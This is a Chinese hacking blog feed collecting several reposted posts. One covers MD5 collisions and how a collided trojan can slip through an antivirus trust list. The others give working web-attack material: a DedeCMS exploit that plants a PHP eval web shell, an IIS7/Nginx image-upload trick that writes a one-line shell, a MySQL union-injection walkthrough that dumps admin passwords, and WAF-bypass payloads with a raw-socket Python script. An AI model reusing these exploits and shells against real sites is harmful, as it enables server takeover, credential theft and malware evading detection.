另:现在,如果仅仅是想要生成 MD5 相同而内容不同的文件的话,在任何主流配置的电脑上用几秒钟就可以完成了。
这几位密码学家编写的“快速 MD5 碰撞生成器”:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
源代码:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
测了一下 那2个exe md5 的确一样的。
运行结果不一样。 未必对现有exe 有实质性的威胁, 但是很明显 是有威胁的。 如果可以加入木马。重新算出md5 的话
那就厉害了
以下是引用片段:
用易语言编译的两个EXE,文件内容不同,但是MD5相同。有图为证。
两个EXE均打包在附件里,人格担保EXE很纯洁(为了压缩体积,加了UPX壳)。
如果你怀疑这两个EXE其实是相同的,而我只是根据某些外部特征来实现不同的运行效果的话,你就尽情地测试吧。
比如你可以把它们随意更改文件名、复制到其他电脑中运行、虚拟机中运行一个并在真实机器中运行另一个,都不会有任何影响,A还是A,B还是B。
你可以使用一些二进制编辑工具来比对两个EXE文件,你会发现它们的不同。也可以像我上传的图片那样,比对包括MD5在内的其他类型的hash。你得到的答案仍然是:它们的文件内容不同,而MD5相同(其他的HASH特征值均不相同)。
仅供娱乐,有兴趣搞清楚怎么回事儿的,就多顶本贴,哈哈。
PS:不要骂人,说了本贴仅供娱乐,顺便讨论一下MD5而已。
以下是引用片段:
用事实说话MD5破解:md5一样两个不同功能内容的文件(附md5破解工具)
能力有限,就不多说了。用事实说话,先看看下面两个在网上满天飞的md5一样二内容功能不同的程序吧:
文件一:
File: D:\HelloWorld-colliding.exe
Size: 41792 bytes
Modified: 2010年5月21日, 15:38:12
MD5: 18FCC4334F44FED60718E7DACD82DDDF
CRC32: 8BEB795C
文件二:
File: D:\GoodbyeWorld-colliding.exe
Size: 41792 bytes
Modified: 2010年5月21日, 15:38:29
MD5: 18FCC4334F44FED60718E7DACD82DDDF
CRC32: 9EDE53DB
可是我们能不能自己制作两个md5 一样而内容不同的文件呢?请继续看下面的操作截图(后附工具)
以上就是大名鼎鼎的"构造前缀法"破解md5 的方法(以下就提供破解工具和"构造前缀法"的含义)
破解工具: Fast 破解工具.7z (88.75 KB, 下载次数: 67) 2010-6-8 12:14:15 上传下载次数: 67
下载积分: PB币 -1
-p 前缀文件(破解工具会以此文件为前缀构造md5碰撞文件)
-o 出处文件(默认的输出文件名是-o msg1.bin msg2.bin)
到这里又有人会问,能不能自己制作一个是病毒木马、一个是正常无害的两个md5 一样的文件呢???
答案依旧是肯定的,下载下面两个文件你就知道了(由于论坛不能放木马之类等,所以只提供外链地址)
http://down.qiannao.com/space/file/ishagua/-4e0a-4f20-5206-4eab/package1.exe/.page
http://down.qiannao.com/space/file/ishagua/-4e0a-4f20-5206-4eab/package2.exe/.page
以上这两个文件一个自解压后是木马病毒一个自解压后是一个平常的Word 文档
依旧会有人问,这是怎么生成的?(这个就不能奉告了,有兴趣的话自己慢慢研究吧,累了)。
以下是引用片段:
给大家个好玩的,,关于MD5碰撞,及360的信任列表隐患,将在6点半更新
纯讨论
不是谈怎样利用,,,,
视频地址:http://dl.dbank.com/c0bap33a8n
记录:
MD5碰撞
首先
先演示一下这两个刚碰撞出来的文件
文件名称:C:\Documents and Settings\Administrator\桌面\1\cbi.exe
文件大小:410240 字节
修改时间:2011年10月10日 16:43:41
MD5 :6EF59C9E016669DD3146B658D11C0A8F
SHA1 :2580646F0803AF53E0B7E70A1A1425CE210723B3
CRC32 :6F75148B
文件名称:C:\Documents and Settings\Administrator\桌面\2\cbi2.exe
文件大小:410240 字节
修改时间:2011年10月10日 16:43:41
MD5 :6EF59C9E016669DD3146B658D11C0A8F
SHA1 :C6A32B97C2E5C9584AB6428D490A1EA1CEE3FCC4
CRC32 :09F69A39
大家可以看出,,两个文件的md5值是完全相同的
但是sh1 crc32却是不同的,,说明这两个文件不是相同文件,,但是
md5相同,这就是碰撞
再来看一下刚刚碰撞出来的360安装包
文件名称:C:\Documents and Settings\Administrator\桌面\cbi.exe
文件大小:32131264 字节
文件版本:8.3.0.1024
修改时间:2011年10月10日 16:34:55
MD5 :686C066950B31203D6B688519498F943
SHA1 :78D15715E393E7F2847F189D2F1C79BF17B3AB55
CRC32 :6CDBAA4E
文件名称:C:\Documents and Settings\Administrator\桌面\cbi2.exe
文件大小:32131264 字节
文件版本:8.3.0.1024
修改时间:2011年10月10日 16:34:54
MD5 :686C066950B31203D6B688519498F943
SHA1 :8F9A9A9036063B7596D3CE2DF151E722AFB0396A
CRC32 :65D9B793
同样的,md5相同 sha 和crc不同
如何做出这些呢 ,都来自一位叫王小云的密码天才的思路弄的 而且完全不会影响运行
两个安装包皆可运行,,md5相同,,内容是不同的
或许很多人会说sha1呢,,,很遗憾 05年王小云把sha1也破解了,,,,,
所以,,云在验证这方面还有电子商务这方面都要有所改进了
不说太远的,,回归话题,,说一下360本地的信任机制
可以看到 360报毒了
接下来 我们把它添加到信任 列表
很多人以为,360的信任列表是匹配路径的,,其实错了,,是直接将md5加入白名单
我们来试试把这个文件移到其他地方
可以看到,,这个文件运行成功了,,这验证了
"很多人以为,360的信任列表是匹配路径的,,其实错了,,是直接将md5加入白名单"
这个结论
接下来,,我们来看看是不是一定是md5 还是其他算法
我们采用相同md5,但是sha1和crc完全相同的两个文件来运行,,同样的 可以运行,,由此可看出,,
360不是将路径加入信任列表,,
而是将md5加入信任列表,,,
或许目前来看这还算安全,,虽然已经能随意产生两个md5完全相同的了,,,但是用在特殊方面,,这无疑是个巨大的漏洞,,
呵呵 ,,只是想探讨下
以上是相关的资料,需要其他资料可以自己去搜:md5 碰撞,有大量资料查阅。
实际上,MD5 值一样,但功能不一样的程序很容易实现,需要一点编程知识,及一点点技巧。。。
方法你自己多试几次就知道了。。。
我自己写的俩小玩意儿如下图所演示:
MD5_碰撞测试程序_示例程序_a
MD5 Test_A.exe
MD5_碰撞测试程序_示例程序_b
MD5 Test_B.exe
MD5_碰撞测试程序_示例程序.rar:http://115.com/file/clonsfie
用到的工具如下:
1、MD5 碰撞发生器 v1.5 (MD5 Collision Generator v1.5)
2、一点点编程技巧
官方地址:http://www.win.tue.nl/hashclash/
下载地址:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
源码下载:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
MD5 碰撞发生器 v1.5,MD5 Collision Generator v1.5:
MD5 碰撞发生器 v1.5
MD5 Collision Generator v1.5
示例:
fastcoll_v1.0.0.5.exe -p C:\WINDOWS\system32\cmd.exe
fastcoll_v1.0.0.5.exe -p C:\WINDOWS\system32\cmd.exe -o a.exe b.exe
--------------------------------------------------------
MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)
Allowed options:
-h [ --help ] 显示选项。
-q [ --quiet ] 更简洁。
-i [ --ihv ] arg 使用指定的初始值。默认是MD5的初始值。
-p [ --prefixfile ] arg 使用给定前缀的文件计算初始值,并复制数据到输出文件。
-o [ --out ] arg 设置输出文件名. 这必须是最后的选项,并且必须指定两个文件名。
默认: -o msg1.bin msg2.bin
--------------------------------------------------------
MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)
Allowed options:
-h [ --help ] Show options.
-q [ --quiet ] Be less verbose.
-i [ --ihv ] arg Use specified initial value. Default is MD5 initial
value.
-p [ --prefixfile ] arg Calculate initial value using given prefixfile. Also
copies data to output files.
-o [ --out ] arg Set output filenames. This must be the last option
and exactly 2 filenames must be specified.
Default: -o msg1.bin msg2.bin
--------------------------------------------------------
# 黑客
# web渗透
1
分享 回复 喜欢
Beyond SQLi: Obfuscate and Bypass
Beyond SQLi: Obfuscate and Bypass
# 黑客
# web渗透
1
分享 回复1 喜欢
DEDECMS拿SHELL EXP
漏洞细节已经传遍了(http://www.t00ls.net/thread-17354-1-1.html),又没得玩了。
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
1
分享 回复9 喜欢
通杀IIS7.0畸形解析0day漏洞和Nginx那个0day差不多
先合并一张PHP一句话图片马,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为“
图片随便找一张.
【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】
一句话:
<?PHP fputs(fopen(’shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
比如假设图片地址为www.doosit.cn/tupian/1.jpg
则执行地址为www.doosit.cn/tupian/1.jpg/shell.php
然后,会在目录下生成shell.php。比如:www.doosit.cn/tupian/shell.php
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[cmd]);?>”)?>
# web渗透
# 黑客
1
分享 回复 喜欢
Mysql5注射技巧总结
Mysql5和之前的版本有很多不同的地方,灵活的运用其特性可以在入侵的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没有写清楚的部分表达出来,你看明白这个文章后也许你会发现,原来mysql5也可以像mssql一样注射。
一、原理分析
我们先看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
如果读者有兴趣可以自己装一个mysql5研究一下这几个表存储的信息,我这里只挑注射中可以用到的几个表。
| SCHEMATA �D�D>存储数据库名的,
|――>关键字段:SCHEMA_NAME,表示数据库名称
| TABLES �D�D>存储表名的
|――>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
| COLUMNS �D�D>存储字段名的
|――>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。
二、实战测试
到网上找到一个注射点,首先还是像以往一样猜字段、版本和数据库用户,如图1
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/*
图一
下面猜数据库,可以通过不断递增limit的第一个参数查询到所有的数据库名,如图2
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15 from/**/information_schema.SCHEMATA limit 17,1/*
图2
遍里webbase里面的表名,找到敏感的表,如图三(0x77656262617365是webbase的十六进制编码)
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.
TABLES/**/where/**/TABLE_SCHEMA=0x77656262617365/**/limit/**/11,1
图3
tg_adminuser十六进制编码为0x74675F61646D696E75736572,依次查找该表里面的字段名,如图4,图5
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.
COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1,1
图4
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.
COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/2,1
图五
数据库,表名,字段我们都知道了,查出密码就很简单了,如图六
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse
图6
文章就到这里结束了,懂点sql语法的朋友应该看的比较明白了:)
转自 WEB渗透
# web渗透
1
分享 回复 喜欢
浅谈绕过WAF的数种方法(转载)
0×00 前言
08年初诞生了一种SQL群注攻击,黑客在全球范围内对asp,asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入,黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改,可以在网站上无差别的进行网页木马攻击。
互联网是快速更新迭代的,但是很多没有开发能力的单位都是通过外包建立网站,网站的程序一上线就再也无人维护,很多程序存在各种漏洞无法修补,于是WAF便有了市场,现今门槛低且最能解决问题的是针对IIS/apache的软件WAF,通常一个模块一个扩展就能搞定,当然也有耗资百万千万的硬件WAF,然而如果WAF拦截规则出现漏洞,这百万千万的硬件也就是一堆废铁。那么WAF是否真的可以解决所有的WEB安全问题呢?所以本文主要解析一些可以绕过WAF的罕见漏洞,供安全人员参考。
0×01 Request对象的包解析漏洞.
asp和asp.net的Request对象存在一个包解析漏洞,Request对象对于GET和POST包的解析过于宽松,用一句话表达就是Request对象它GET和POST傻傻分不清楚,稍有点web开发经验的同学应该知道Request接收GET,POST,COOKIE也就是GPC传过来的数据,但是asp和.net库内置的Request对象完全不按RFC标准来,下面我们可以做个测试:
分别将下面两段代码保存为1.asp和1.aspx
使用asp的Request对象接收t参数传值
―――――――――――――――�C
<%
Response.Write “Request:” & Request(“t”)
%>
―――――――――――――――�C
使用asp.net的Request对象接收t参数传值
―――――――――――――――�C
<%@ Page Language=”C#” %>
<%
string test = Request["t"];
Response.Write(“Request:”+test);
%>
―――――――――――――――�C
使用下面的python脚本调用socket发送原始的HTTP包
―――――――――――――――�C
#!/usr/bin/env python
import socket
host = ’192.168.239.129′
path = ‘/1.asp’
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
exploit_packet=”t=’/**/or/**/1=1�C”
exploit_packet+=”\r\n” * 8
packet_length = len(exploit_packet)
packet=’GET ‘ + path + ‘ HTTP/1.1\r\n’
packet+=’Host: ‘ + host + ‘\r\n’
packet+=’Content-Length: %s\r\n’ % packet_length
packet+=’Content-Type: application/x-www-form-urlencoded\r\n’
packet+=’\r\n’
packet = packet + exploit_packet
print packet
s.send(packet)
buf = s.recv(1000)
if buf: print buf[buf.rfind("\r\n"):]
s.close()
―――――――――――――――�C
我们发送的原始包是:
GET /1.asp HTTP/1.1
Host: 192.168.239.129
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
t=’/**/or/**/1=1�C
结果返回如下:
Request:’/**/or/**/1=1�C
将python测试脚本的path改为/1.aspx测试页返回同样结果。
我们可以看到这是一个畸形的HTTP GET请求包,这个包的奥秘在于t=’/**/or/**/1=1�C参数后的8个回车换行和Content-Length头,包的结构类似于一个POST包,而请求的方法是GET,最后asp和asp.net的Request对象成功的解析了这个畸形包取出了数据。
所以如果WAF没有处理好HTTP包的内容,沿用常规思路处理GET和POST的逻辑的话,那么这个畸形包将会毁掉WAF的基础防御。
0×02 被遗忘的复参攻击.
大家应该还记得09年的HTTP Parameter Pollution攻击,查看[3]文档,可以发现ASP/IIS和ASP.NET/IIS的场景下存在一个复参特性,本文将利用这种的特性的攻击简称为复参攻击,用0X01里的例子简单的测试一下:
用GET请求传入两个t参数
GET http://192.168.239.129/1.asp?t=1&t=2
将返回
Request:1, 2
asp和asp.net的Request对象接收了两个参数,并且以逗号分隔,所以便衍生出了[3]文档中的复参SQL注入方法:
Vulnerable code:
SQL=”select key from table where id=”+Request.QueryString(“id”)
This request is successfully performed using the HPP technique:
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
The SQL request becomes:
select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/usersLavakumarKuppan,
我们可以看到通过巧妙的运用注释符结合复参特性可以分割GET参数中的SQL注入语句,如果WAF对GET参数的处理过于简单是不是会匹配不到拦截规则呢?
0×03 高级复参攻击.
ASP.NET的Request对象有一个Params属性,ASP.NET程序员在一些程序中会使用Request.Params["xxx"]传入数据,参考[4]微软MSDN文档我们可以知道Params属性的特性,该属性接收GET,POST和Cookie的传值集合,这里我们可以修改0×01里的例子测试一下:
使用asp.net的Request.Params方法接收t参数传值
―――――――――――――――�C
<%@ Page Language=”C#” %>
<%
string test = Request.Params["t"];
Response.Write(“Request:”+test);
%>
―――――――――――――――�C
发送一个POST包,GET,POST,COOKIE三个方法中都带有不同的t参数内容
―――――――――――――――�C
POST http://192.168.239.129/1.aspx?t=1 HTTP/1.1
Host: 192.168.239.129
Cookie: t=2
t=3
―――――――――――――――�C
结果返回
Request:1,3,2
最后得出结论,Request.Params方法接收的数据是按照GPC顺序整合,看到这里的同学再联想到0×02的复参攻击应该如醍醐灌顶了,我们可以将SQL攻击语句拆分到GET,POST,COOKIE三个变量里进行组合攻击。想一想WAF针对这种高级复参攻击是否防御好了?
0×04 后话
WAF是不可能解决所有安全问题的,本文的思路归其本源实际上是描叙了WAF处理HTTP包与服务端处理HTTP包数种差异。互联网是不断更新迭代的,差异存在,类似的漏洞也会存在。
本文提到了三种绕过WAF的思路,第一种是我的原创属于0DAY状态,第二种是参考已有的复参攻击,其中第三种高级复参攻击是由Safe3同学提出的,本文也是与Safe3同学讨论他开发的WAF的BUG而来,所以感谢Safe3同学。
另外请大家不要将本文的内容用于非法途径,仅供安全人员参考,谢谢。
参考:
[1].http://www.faqs.org/rfcs/rfc2616.html
[2].http://www.w3school.com.cn/asp/asp_ref_request.asp
[3].http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
[4].http://msdn.microsoft.com/en-us/library/system.web.httprequest.aspx
Comments (0)
本站内容均为原创,转载请务必保留署名与链接!
浅谈绕过WAF的数种方法:http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html
上一篇 下一篇